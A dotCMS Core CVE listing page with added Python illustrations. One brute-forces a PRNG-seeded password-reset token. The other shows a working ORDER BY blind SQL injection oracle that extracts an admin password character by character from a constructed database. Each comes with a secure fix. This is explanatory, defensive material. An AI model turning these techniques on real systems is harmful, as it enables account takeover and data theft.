Core
by Dotcms
CVEs (10)
| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2016-2355 | dotCMS / Core | Critical | 0.64 | 9.8 | 0.01 | — | Dec 19, 2016 | SQL injection vulnerability in the REST API in dotCMS before 3.3.2 allows remote attackers to execute arbitrary SQL commands via the stName parameter to api/content/save/1. |
| CVE-2016-8600 | dotCMS / Core | High | 0.49 | 7.5 | 0.01 | — | Oct 28, 2016 | In dotCMS 3.2.1, an attacker can load a captcha once, solve it, and then reuse that correct value for later forms that perform a captcha check. |
| CVE-2016-4803 | dotCMS / Core | High | 0.49 | 7.5 | 0.00 | — | Jun 30, 2016 | CRLF injection vulnerability in the send email functionality in dotCMS before 3.3.2 allows remote attackers to inject arbitrary email headers via CRLF sequences in the subject. |
| CVE-2018-17422 | dotCMS / Core | — | 0.01 | — | 0.11 | — | Mar 7, 2019 | dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. |
| CVE-2022-45782 | dotCMS / Core | — | 0.00 | — | 0.00 | — | Feb 1, 2023 | An issue was discovered in dotCMS core 5.3.8.5 through 5.3.8.15 and 21.03 through 22.10.1. A cryptographically insecure random generation algorithm for password-reset token generation leads to account takeover. |
| CVE-2022-45783 | dotCMS / Core | — | 0.00 | — | 0.00 | — | Feb 1, 2023 | An issue was discovered in dotCMS core 4.x through 22.10.2. An authenticated directory traversal vulnerability in the dotCMS API can lead to Remote Code Execution. |
| CVE-2018-19554 | dotCMS / Core | — | 0.00 | — | 0.00 | — | Nov 26, 2018 | An issue was discovered in dotCMS through 5.0.3. Attackers may perform XSS attacks via the inode, identifier, or fieldName parameter in html/js/dotcms/dijit/image/image_tool.jsp. |
| CVE-2018-16980 | dotCMS / Core | — | 0.00 | — | 0.00 | — | Sep 12, 2018 | dotCMS 5.0.1 has XSS in the /html/portlet/ext/contentlet/image_tools/index.jsp fieldName and inode parameters. |
| CVE-2016-10007 | dotCMS / Core | — | 0.00 | — | 0.00 | — | Feb 19, 2018 | SQL injection vulnerability in the "Marketing > Forms" screen in dotCMS before 3.7.2 and 4.x before 4.1.1 allows remote authenticated administrators to execute arbitrary SQL commands via the _EXT_FORM_HANDLER_orderBy parameter. |
| CVE-2016-10008 | dotCMS / Core | — | 0.00 | — | 0.00 | — | Feb 19, 2018 | SQL injection vulnerability in the "Content Types > Content Types" screen in dotCMS before 3.7.2 and 4.x before 4.1.1 allows remote authenticated administrators to execute arbitrary SQL commands via the _EXT_STRUCTURE_direction parameter. |
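CVE-2022-45782 names the bug class (a password-reset token drawn from a non-cryptographic PRNG) without showing it. The following is an added illustration, not dotCMS code and not a claim about how dotCMS generated its tokens: a token derived from a seeded `random.Random` is a pure function of the seed, so an attacker who can bound the seed (a millisecond timestamp in this constructed scenario) recovers the token by brute force; the secure variant uses the OS CSPRNG via `secrets` and redeems tokens single-use, time-limited, and with a constant-time comparison. The token store, TTL and function names are hypothetical.

```python
import hmac
import random
import secrets
import time
from typing import Dict, Optional, Tuple

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
TOKEN_TTL_SECONDS = 15 * 60

# Hypothetical in-memory token store (constructed for this example):
# token -> (user id, expiry as epoch seconds).
_RESET_TOKENS: Dict[str, Tuple[str, float]] = {}


def weak_reset_token(seed: int, length: int = 32) -> str:
    """Token drawn from a seeded, non-cryptographic PRNG (Mersenne Twister).

    Generic form of "cryptographically insecure random generation": the token
    is fully determined by the seed, so anyone who can guess the seed
    (e.g. a millisecond timestamp) reproduces the token exactly.
    """
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def recover_seed(token: str, seed_lo: int, seed_hi: int) -> Optional[int]:
    """Attacker's view: walk a plausible seed window until the token matches."""
    for seed in range(seed_lo, seed_hi):
        if weak_reset_token(seed) == token:
            return seed
    return None


def secure_reset_token() -> str:
    """256 bits from the OS CSPRNG: no seed to guess, no state to recover."""
    return secrets.token_urlsafe(32)


def issue_reset(user: str, now: Optional[float] = None) -> str:
    """Issue a secure, time-limited reset token for `user`."""
    now = time.time() if now is None else now
    token = secure_reset_token()
    _RESET_TOKENS[token] = (user, now + TOKEN_TTL_SECONDS)
    return token


def redeem_reset(token: str, now: Optional[float] = None) -> Optional[str]:
    """Single-use, expiring redemption; returns the user id or None."""
    now = time.time() if now is None else now
    if not token.isascii():          # compare_digest on str requires ASCII
        return None
    match = None
    # Compare against every stored token so timing does not reveal a near-miss.
    for stored in list(_RESET_TOKENS):
        if hmac.compare_digest(stored, token):
            match = stored
    if match is None:
        return None
    user, expiry = _RESET_TOKENS.pop(match)   # pop first: single use even if expired
    return user if now <= expiry else None
```

The brute-force window in `recover_seed` is deliberately small so the example runs instantly; the point is that the search space of a timestamp-seeded PRNG is a matter of engineering, whereas 256 bits from `secrets` is not searchable at all.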
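CVE-2016-10007 and CVE-2016-10008 are both injections through sort parameters (`orderBy`, `direction`). Those sit in the `ORDER BY` clause, where bind parameters cannot be used, which is why such bugs survive in otherwise parameterized code. The following is an added, self-contained illustration (not dotCMS code; table names, columns and the admin row are constructed for the example) of how a sort-parameter injection is exploited as a boolean oracle, and of the allowlist fix. It runs on SQLite's in-memory database.

```python
import sqlite3
from typing import List, Tuple

# Only these identifiers may ever reach the ORDER BY clause.
ALLOWED_ORDER_COLUMNS = {"title": "title", "mod_date": "mod_date", "inode": "inode"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

Row = Tuple[str, str]


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a forms table and a user table to steal from."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE form_handler (inode TEXT, title TEXT, mod_date TEXT)")
    conn.execute("CREATE TABLE user_ (userid TEXT, password TEXT)")
    conn.executemany("INSERT INTO form_handler VALUES (?, ?, ?)", [
        ("i1", "Contact", "2016-01-01"),
        ("i2", "Signup", "2016-02-01"),
        ("i3", "Feedback", "2016-03-01"),
    ])
    conn.execute("INSERT INTO user_ VALUES ('admin', 's3cret-hash')")
    return conn


def list_forms_vulnerable(conn, order_by: str, direction: str) -> List[Row]:
    """Vulnerable: sort parameters are concatenated straight into the SQL."""
    sql = f"SELECT inode, title FROM form_handler ORDER BY {order_by} {direction}"
    return conn.execute(sql).fetchall()


def list_forms_fixed(conn, order_by: str, direction: str) -> List[Row]:
    """Fixed: map user input to allowlisted identifiers; reject anything else."""
    col = ALLOWED_ORDER_COLUMNS.get(order_by)
    dirn = ALLOWED_DIRECTIONS.get(direction.lower())
    if col is None or dirn is None:
        raise ValueError("unsupported sort parameter")
    return conn.execute(f"SELECT inode, title FROM form_handler ORDER BY {col} {dirn}").fetchall()


# Row order when sorted by title ASC; any other order means the oracle said "false".
TITLE_ORDER: List[Row] = [("i1", "Contact"), ("i3", "Feedback"), ("i2", "Signup")]


def oracle(conn, prefix: str) -> bool:
    """Attacker's boolean oracle: the CASE expression sorts by title when the
    guessed prefix of admin's password is right, and by inode when it is wrong.
    No stacked query is needed, so a single-statement API does not stop it."""
    payload = (
        f"(CASE WHEN (SELECT substr(password, 1, {len(prefix)}) FROM user_ "
        f"WHERE userid = 'admin') = '{prefix}' THEN title ELSE inode END)"
    )
    return list_forms_vulnerable(conn, payload, "ASC") == TITLE_ORDER


def exfil_admin_password(conn, alphabet="abcdefghijklmnopqrstuvwxyz0123456789-", max_len=16) -> str:
    """Recover the stored value one character at a time through the sort order."""
    found = ""
    for _ in range(max_len):
        for ch in alphabet:
            if oracle(conn, found + ch):
                found += ch
                break
        else:
            return found   # no extension matched: end of string
    return found
```

The fix does not try to "escape" the parameter: identifiers in `ORDER BY` cannot be bound, so the only safe approach is to treat the request value as a key into a fixed map and fail closed on anything else, as `list_forms_fixed` does.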